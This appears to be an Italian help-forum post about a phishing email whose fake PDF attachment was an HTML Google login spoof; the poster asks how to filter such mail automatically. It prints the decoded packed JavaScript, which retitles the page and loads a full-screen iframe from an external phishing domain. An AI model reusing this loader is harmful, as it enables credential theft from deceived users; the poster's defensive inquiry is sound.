Il nostro ufficio ha ricevuto un'email a Natale. C'era quello che sembrava essere un file PDF allegato.
Quando abbiamo esaminato il file, si trattava in realtà di un file Html per una pagina di login di spoofing di Google.
Aveva anche una grande quantità di <Script>
codificato
Lo script decodificato è:
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.2.b="8\'a g r l";k{(j(){m 1=3.2.n(\'1\');1.p=\'o/x-4\';1.i=\'9 4\';1.h=\'6://c.f/d/q/D/H.G\';2.s(\'F\')[0].I(1)}())}J(e){}3.2.K.L="<5 E=\"6://w.v/u/t.y\" z=\"C: 0;B: 7%;A:7%\">";',48,48,'|link|document|window|icon|iframe|http|100|You|shortcut|ve|title|kitt|assets||ai|been|href|rel|function|try|out|var|createElement|image|type|img|signed|getElementsByTagName|daiso|vasdu|top|bowlanreedesntal||html|style|height|width|border|guoguo|src|head|ico|google|appendChild|catch|body|outerHTML'.split('|'),0,{}
È interessante notare che l'URL nel file HTML era nella pagina di accesso di Google
Ho pensato che le e-mail con script sarebbero state contrassegnate automaticamente, come inviare un file .exe
o .bat
Esistono ulteriori precauzioni che possiamo adottare per garantire che messaggi come questo siano contrassegnati o spostati in futuro in spam senza l'intervento dell'utente?